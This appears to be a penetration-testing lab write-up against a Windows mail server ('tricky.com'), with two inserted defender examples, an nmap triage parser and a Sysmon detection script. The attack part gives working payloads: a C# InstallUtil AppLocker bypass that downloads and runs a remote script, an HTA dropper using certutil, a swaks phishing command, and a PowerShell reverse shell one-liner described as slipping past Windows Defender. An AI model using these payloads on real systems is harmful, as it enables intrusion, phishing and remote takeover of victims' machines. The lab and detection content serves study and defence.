Command: nmap -A -Pn 192.168.243.159

Nmap initial output

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 01:28 EDT
Nmap scan report for 192.168.243.159
Host is up (0.21s latency).
Not shown: 991 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mail01.tricky.com, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
**80/tcp   open  http          Microsoft IIS httpd 10.0**
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: **Tricky.com Mail system information**
|_http-server-header: Microsoft-IIS/10.0
110/tcp  open  pop3          hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp  open  imap          hMailServer imapd
|_imap-capabilities: completed IMAP4rev1 RIGHTS=texkA0001 OK SORT CHILDREN NAMESPACE CAPABILITY QUOTA ACL IDLE IMAP4
445/tcp  open  microsoft-ds?
587/tcp  open  smtp          hMailServer smtpd
| smtp-commands: **mail01.tricky.com**, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
**3389/tcp open  ms-wbt-server Microsoft Terminal Services**
| ssl-cert: Subject: commonName=mail01.tricky.com
| Not valid before: 2022-03-20T12:45:14
|_Not valid after:  2022-09-19T12:45:14
| rdp-ntlm-info: 
|   Target_Name: TRICKY
|   NetBIOS_Domain_Name: TRICKY
|   NetBIOS_Computer_Name: MAIL01
|   DNS_Domain_Name: tricky.com
|   DNS_Computer_Name: mail01.tricky.com
|   DNS_Tree_Name: tricky.com
|   Product_Version: 10.0.17763
|_  System_Time: 2022-07-18T05:29:24+00:00
|_ssl-date: 2022-07-18T05:29:34+00:00; 0s from scanner time.
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
No OS matches for host
Network Distance: 2 hops
Service Info: Host: mail01.tricky.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-07-18T05:29:27
|_  start_date: N/A

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   205.64 ms 192.168.49.1
2   205.70 ms 192.168.243.159

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.41 seconds
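
A defender's triage of the scan above, added here as an example and not part of the original write-up: a small parser for nmap's normal output, fed the port table from this scan, that turns the NSE script lines into findings (AUTH LOGIN offered without STARTTLS on 25/587, TRACE enabled on 80, SMB signing not required, the RDP certificate's remaining validity). The rules and the 90-day certificate threshold are the example's own assumptions.

```python
import re
from datetime import date

# Constructed sample input: the port table and script output from the
# "nmap -A -Pn 192.168.243.159" run shown above, trimmed to the lines the
# triage rules look at.
SAMPLE_NMAP = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 01:28 EDT
Nmap scan report for 192.168.243.159
Host is up (0.21s latency).
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mail01.tricky.com, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Tricky.com Mail system information
445/tcp  open  microsoft-ds?
587/tcp  open  smtp          hMailServer smtpd
| smtp-commands: mail01.tricky.com, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=mail01.tricky.com
| Not valid before: 2022-03-20T12:45:14
|_Not valid after:  2022-09-19T12:45:14

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
START_RE = re.compile(r"^Starting Nmap .* at (\d{4}-\d{2}-\d{2})")


def parse_nmap(text):
    """Parse nmap's normal (-oN style) output.

    Returns (scan_date, ports, host_scripts): ports maps the port number to a
    dict with proto/state/service/version plus the NSE script lines that
    followed it; host_scripts holds the lines under 'Host script results:'.
    """
    scan_date, ports, host_scripts = None, {}, []
    current, in_host = None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        m = START_RE.match(line)
        if m:
            scan_date = date.fromisoformat(m.group(1))
            continue
        if line.startswith("Host script results:"):
            in_host, current = True, None
            continue
        m = PORT_RE.match(line)
        if m and not in_host:
            current = {"proto": m.group(2), "state": m.group(3),
                       "service": m.group(4), "version": m.group(5), "script": []}
            ports[int(m.group(1))] = current
            continue
        if line.startswith("|"):
            # drop the '| ' / '|_' prefix and indentation of NSE output
            body = line.lstrip("|_").strip()
            if in_host:
                host_scripts.append(body)
            elif current is not None:
                current["script"].append(body)
    return scan_date, ports, host_scripts


def triage(scan_date, ports, host_scripts):
    """Apply defender-side rules to the parsed scan; returns (port, message) tuples."""
    findings = []
    for port, info in sorted(ports.items()):
        script = "\n".join(info["script"])
        if info["service"] == "smtp" and "AUTH LOGIN" in script and "STARTTLS" not in script:
            findings.append((port, "SMTP offers AUTH LOGIN without STARTTLS: credentials cross the wire in cleartext"))
        if "Potentially risky methods:" in script:
            methods = script.split("Potentially risky methods:")[1].splitlines()[0].split()
            findings.append((port, "risky HTTP methods enabled: " + ", ".join(methods)))
        if port == 3389 and info["state"] == "open":
            findings.append((port, "RDP reachable from the scanning network; limit to VPN/jump host and enforce NLA"))
        m = re.search(r"Not valid after:\s*(\d{4}-\d{2}-\d{2})", script)
        if m and scan_date:
            days = (date.fromisoformat(m.group(1)) - scan_date).days
            if days < 0:
                findings.append((port, f"TLS certificate expired {-days} days before the scan"))
            elif days <= 90:  # assumed renewal window
                findings.append((port, f"TLS certificate expires in {days} days"))
    if any("Message signing enabled but not required" in l for l in host_scripts):
        findings.append((445, "SMB signing not required: host is exposed to NTLM relay; require signing via GPO"))
    return findings


def run_sample():
    return triage(*parse_nmap(SAMPLE_NMAP))


if __name__ == "__main__":
    for port, msg in run_sample():
        print(f"{port:>5}  {msg}")
```

On this scan the script reports six findings; the SMB-signing one applies to the host rather than a single port, so it is attached to 445.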

Visit port 80:

01.png

From the homepage description, the target has antivirus software and Office is not installed, so Office-based phishing is a dead end. Instead, try phishing with an HTA. Following the AppLocker bypass code on P280, the code is as follows:

```csharp
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace Bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Nothing going on in this binary.");
        }
    }
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : Installer
    {
        // Invoked by InstallUtil.exe /U; hosts PowerShell in-process via System.Management.Automation
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.243/rev.ps1') | iex";
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
        }
    }
}
```

The HTA code can be as follows:

```html
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("powershell iwr -uri http://192.168.49.243/enc.txt -outfile C:\\Windows\\Tasks\\enc.txt;powershell certutil -decode C:\\Windows\\Tasks\\enc.txt C:\\Windows\\Tasks\\clm.exe; C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\clm.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
```
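
The detection-side counterpart, added here as an example and not taken from the write-up: rule checks over constructed Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) records modelled on the chain the HTA above drives (mshta.exe, then powershell downloading into C:\Windows\Tasks, certutil -decode, InstallUtil.exe /U, and System.Management.Automation.dll loaded into InstallUtil.exe). The event layout, paths and rule wording are the example's own assumptions.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class Event:
    """Minimal view of a Sysmon record: kind is 'process' (Event ID 1)
    or 'imageload' (Event ID 7). Field names are this example's own."""
    kind: str
    image: str
    parent: str = ""
    cmdline: str = ""
    loaded: str = ""


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b")


def _name(path):
    return PureWindowsPath(path).name.lower()


def check(ev):
    """Return the rule hits for one event (empty list when nothing matches)."""
    alerts = []
    img = _name(ev.image)
    if ev.kind == "process":
        cl = ev.cmdline.lower()
        if img == "mshta.exe" and re.search(r"https?://", cl):
            alerts.append("mshta.exe executing a remotely hosted HTA")
        if _name(ev.parent) in SCRIPT_HOSTS and img in SHELLS:
            alerts.append(f"{_name(ev.parent)} spawned {img}")
        if img in SHELLS and DOWNLOAD_RE.search(cl) and "c:\\windows\\tasks" in cl:
            alerts.append("download written to C:\\Windows\\Tasks (user-writable path under the Windows directory)")
        if img == "certutil.exe" and re.search(r"\s-(decode|urlcache)\b", cl):
            alerts.append("certutil.exe used to decode or fetch a file")
        if img == "installutil.exe" and re.search(r"\s/u(ninstall)?\b", cl):
            alerts.append("InstallUtil.exe run with /U: Uninstall() of a user-supplied assembly executed")
    elif ev.kind == "imageload":
        # PowerShell engine loaded by something other than a PowerShell host
        if _name(ev.loaded) == "system.management.automation.dll" and img not in PS_HOSTS:
            alerts.append(f"{img} loaded System.Management.Automation.dll (PowerShell hosted outside powershell.exe)")
    return alerts


def scan(events):
    return [(ev.image, a) for ev in events for a in check(ev)]


# Constructed sample events modelled on the chain the HTA above would produce
# (host names, PIDs and timestamps omitted; the DLL path is a placeholder).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
IU = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          r'"C:\Windows\System32\mshta.exe" http://192.168.49.243/rev.hta'),
    Event("process", PS, r"C:\Windows\System32\mshta.exe",
          r"powershell iwr -uri http://192.168.49.243/enc.txt -outfile C:\Windows\Tasks\enc.txt;"
          r"powershell certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\clm.exe; "
          + IU + r" /logfile= /LogToConsole=false /U C:\Windows\Tasks\clm.exe"),
    Event("process", r"C:\Windows\System32\certutil.exe", PS,
          r"certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\clm.exe"),
    Event("process", IU, PS,
          IU + r" /logfile= /LogToConsole=false /U C:\Windows\Tasks\clm.exe"),
    Event("imageload", IU,
          loaded=r"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\System.Management.Automation.dll"),
    # benign control: an administrator running a cmdlet from the desktop
    Event("process", PS, r"C:\Windows\explorer.exe", r"powershell.exe Get-Process"),
]


if __name__ == "__main__":
    for image, alert in scan(SAMPLE_EVENTS):
        print(f"{_name(image):<16} {alert}")
```

The image-load rule is the one that survives renaming or re-signing of the dropped assembly: the C# program above hosts PowerShell through System.Management.Automation, so the engine DLL shows up inside InstallUtil.exe regardless of how the file reached C:\Windows\Tasks.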

Send a phishing email to [email protected] with swaks:

```sh
swaks --body 'Please click here http://192.168.49.243/rev.hta' --header "Subject: Issues with mail" --to [email protected] --from [email protected] --server 192.168.243.159
```

03.png

Considering that AV (Windows Defender) may be present, a PowerShell one-liner generated on the Online Reverse Shell Generator site is used here. (The reverse shell that had previously gotten past the latest Windows Defender could not call back this time, and the AV did not flag it either; I have no idea what the problem was, which is a bit puzzling. Oddly, the generated one-liner PowerShell reverse shell is not caught at all, which is also surprising.)

The reverse shell is as follows:

```powershell
$TCPClient = New-Object Net.Sockets.TCPClient('192.168.49.243', 443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
```

The reverse shell obtained:

04.png

The internal network address turns out to be 172.16.243.155.

Log in to .159 over 3389 with the newly created user's credentials:

```sh
rdesktop -d tricky.com -u crack -p Passw0rd! 192.168.64.159
```